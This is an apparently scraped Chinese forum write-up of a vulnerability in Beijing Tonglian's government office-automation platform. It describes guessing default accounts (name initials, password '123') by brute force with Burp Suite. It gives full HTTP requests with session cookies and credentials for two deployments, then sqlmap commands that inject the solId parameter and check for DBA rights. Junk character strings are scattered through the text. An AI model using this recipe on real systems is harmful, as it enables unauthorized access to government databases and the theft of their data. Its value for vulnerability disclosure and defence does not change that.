|
+ u5 s. ` Q) F F( a
2 P: \6 N k8 f# L; `1 J3 P - q: @. _0 G9 [3 k$ F! R
+ Q' m4 m J+ |
平台简介:) N% V2 \, I. ^! C/ ?4 V
& D& K- v' k- r+ u+ u
7 f: B- I% ^4 U" n. x4 C. a& a
$ q3 {6 V* j4 U# z1 j9 Z# q
% P. b% b+ c8 I
. Y# q5 S" j) o' C 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。 . W3 s: X D* ?% a1 W |8 w% X) J: _
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
8 [5 S+ j- Z& D7 t0 l* [同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!0 S, {; v% E) l7 r0 _' {8 P, |; y
2 j5 O) ~( x! G* t& N+ K
) |, Q& ]0 |& K: a7 e n
/ j" {, Y8 [6 G+ ?1 [0 Z. k" h
* d9 |9 ?' K3 F+ ]
/ P R; [/ O% o, x 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:, S! T% m- \. S/ ^/ v
8 c# B' I* e6 P" B% C" T
4 q3 ~1 Q+ y9 d! f0 `3 P
& a3 {* s! e7 `, Q: o0 V
4 d5 l1 G+ [7 g, y: X! v- m3 R2 f; T+ E7 g
http://1.1.1.1:7197/cap-aco/#(案例2-)- r8 C$ c% Z. s& ]# y q$ Y
) C, w8 X- b" B# S3 }1 g: ]! e5 t; @) |# _
http://www.XXOO.com (案例1-官网网站)0 H$ U/ L/ |( R: P
$ {" s! M0 c% X+ _, F* C
; ~2 ?/ n4 W# R
) h4 x$ w2 p: a! ?5 U
- @8 ?$ o' W& H& B
3 g' W v2 M) \! ?* ~ 漏洞详情:
, P! c2 O6 _$ c9 b; F% g ( _1 n7 S: E6 n
+ q/ l# p) _" D! _ 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试" P5 _ Y, M3 ]! ^( b9 O. R2 ^
6 `0 I/ n$ a5 A. o4 W" H q2 @. E+ z+ \
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
# H6 r2 @$ W3 h5 Q
9 P2 F7 w0 K- O! O+ u2 m/ g, k7 o, _8 u
, c5 W& X6 [6 I" p1 L
7 S& x& }- f' r0 [
2 D( d6 D j) G; ~, _( L6 y6 y
) L" U- A; u/ d: N + M/ Y8 J9 H% ~2 h3 o- s7 O" y! q8 U$ D& w
9 M# R2 N. K+ l: ~1 x! q3 H status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
& H' L$ m' t* [$ Y
9 u9 h! w& @, H$ ~% S/ L, t1 m7 v+ P9 v) p4 Z! p3 o8 g
1、案例1-官方网站
+ A4 j$ w! ? ~' U+ U6 U
3 P R( F0 z- J6 {1 C5 U) H, E
3 u. I1 [6 H K& T GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
) C l+ t! C) {. j" g4 T
1 i s6 e, A: ~ |; ?2 d! l1 k5 X0 f' \: v
Host: www.XXOO.com
) A, D) W0 D5 T0 B6 N9 D 9 U) n( g2 R% o: x
. q6 H5 B% Y, ]: Q. H' j) n
Proxy-Connection: Keep-Alive
/ |6 c: {3 C' @- ~& c/ S$ T* D* M
w7 l) _( q& U
& I8 p. r; a4 s0 E4 _ Accept: application/json, text/javascript, */*; q=0.013 ^/ l7 O1 Z: U u {) a3 ?
$ M# p# C" P3 T8 i8 {6 }
' ~+ ?7 X4 B- e8 E/ z Accept-Language: zh-CN
; N, A+ [. t3 n( r
$ O- Q# d A* b" D0 ?
) V# {) _& w' C% t0 N" M Content-Type: application/json
5 a# w( I3 a8 L2 m9 V, K$ s ) H" m3 C& ]% I+ T- d
: ^) }" e9 T v3 @
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko% ~( P- P5 E: H& a# ?3 R
; ]) V7 p+ q0 F0 P6 i! H+ q) |& {9 P+ \2 [& w
X-Requested-With: XMLHttpRequest) {* }9 Q. v0 ~
8 r+ g% D# K5 e3 o( A- o8 T, o: `' H1 Z+ v& w: W, g
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
* I# Z) G- d: g: `3 ?& M% j# J4 y
_" w- h: M% }" w/ F. Z/ C# h1 n9 H" o' c
Accept-Encoding: gzip, deflate, sdch+ y2 R; X9 I+ Q/ F/ l- Z1 L+ z; p# y
5 D }+ ~! r% Z2 I k" Y
1 M- }' z& i; H- C, f n* f& _ Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
, g9 o$ M7 p9 M0 g. `, i- ~# N - Q0 p; z4 L, r
a5 |) W, w% n9 t4 f- w7 b
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:) m. R7 H4 @% T( C* h7 H
. P" S7 A8 E. z. U
% I+ Y& E3 H& w. S" c% ^/ ]
. W2 C# t6 B. G: Q+ q% h/ U( U
+ {/ A8 |* U$ l' G: g- d' ]: H
" N% j7 O8 \8 W9 V. B
$ {! m" U' q8 p$ {1 H
9 M/ { k: U7 |. u+ n7 E" d
1 o5 Q% b6 G$ G0 J& Y 2 T, O0 u: ]# ~7 j; E# ] z9 \2 n3 n) {
5 }6 w" U+ n% S' {+ u+ T7 _, J: M5 [! K
* {. Y( G5 \( w$ n/ C; k
4 p; B! v1 Q# E- ?6 b7 r% a
3 W; f. x2 J# r/ \ $ f4 F; ?2 D( u3 \8 l) l, I
5 T9 C4 u: F( Z% I$ T$ W' G' y8 ^
$ B; t$ P2 E7 x: X# L A 2、案例2-某天河云平台
0 i! n9 _9 N2 F* L5 U
* I" I8 j2 c: \5 ^( R! U' ^9 o1 z8 `( L4 ~4 a1 s2 o v
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
* v& B/ O+ C& _. o, U
7 F4 V# C' ?' l: | c& w8 _" v6 ]; L! O, _8 Q M$ K
Host: 1.1.1.:7197
0 B0 K& I) ]; X( c2 }7 g1 v+ y 2 C7 T: g9 A; L3 k
( _/ c; H& [, q/ B
Accept: application/json, text/javascript, */*; q=0.01
" U4 C* ~% g4 c# s8 u7 [( y
4 X- y5 p1 x. w) X7 x
$ q6 S, T6 B, y! B X-Requested-With: XMLHttpRequest/ w" D' C0 B. w" k% @7 C
' {; _5 F9 F' A! | \& V
- r' |- |5 z( h8 [5 K1 j User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
H: T% L$ P, d/ Z4 P: z3 p* x1 A " U8 j; X6 C1 G8 i( B
+ p3 @5 J( u y& o
Content-Type: application/json5 N4 T" K5 m# {; J, i
: U6 g6 y/ j( J- z" n/ m: y1 c8 e# V& Y, q
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
5 }( O, X* e$ s# t" X6 W* y 7 Q' u# i" y. y( A5 T
6 N3 |3 K+ r) a' x+ T2 ?% }1 W Accept-Language: zh-CN,zh;q=0.8* R/ r$ `$ g+ K
' W( f) N7 z; z- x4 u7 K8 b* [
& R4 n% R" T: i+ g- j k8 q- t9 C Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1. O# O( J! v+ B: O7 ]; ~
8 n! \, r% P$ k. {( {& g% q( N% }) Y5 Z% C
Connection: close/ r- q3 h- j6 W) K( K
1 @9 a* u4 D, b6 {4 j; h9 U
3 {1 S. K; K, X/ X+ n 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
! p6 ?7 Z# g4 \! g& e * W& ~! B3 B; h, A+ L
: C# O8 l# p7 ^
, W2 f- r5 A. @ e- r8 k M# E1 M2 s/ y4 ^" d T
7 F2 t/ O0 d2 ?0 d& O# ?& ]$ x( t% y : @! _, ^ @6 j# i2 ?
|